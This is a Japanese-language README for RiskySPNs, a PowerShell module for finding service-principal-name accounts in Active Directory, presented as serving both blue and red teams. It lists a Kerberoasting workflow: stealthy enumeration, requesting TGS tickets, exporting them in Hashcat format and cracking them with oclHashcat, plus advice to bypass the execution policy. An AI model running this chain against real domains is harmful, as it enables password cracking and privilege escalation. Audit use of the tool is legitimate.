
RiskySPNsは、SPN (Service Principal Name) に関連付けられたアカウントを検出および悪用することに焦点を当てたPowerShellスクリプトのコレクションです。このモジュールは、ブルーチームが潜在的に危険なSPNを特定するのに役立つ一方、レッドチームがKerberosとActive Directoryを活用して権限を昇格させるのにも役立ちます。
詳細情報:http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
またはスクリプトを直接読み込む(Webから IEX することも可能)
. .\Find-PotentiallyCrackableAccounts.ps1
Set-ExecutionPolicy が Unrestricted または Bypass に設定されていることを確認してください
Get-Help Get-TGSCipher -Full
すべての関数には -Verbose モードもあります
脆弱なアカウントを見つける
Find-PotentiallyCrackableAccounts
Sensitive + RC4 = $$$
脆弱なアカウントに関する完全な詳細レポートを生成する (CISOが喜びます)
Export-PotentiallyCrackableAccounts
SPNのKerberos TGSを要求する
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
または
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3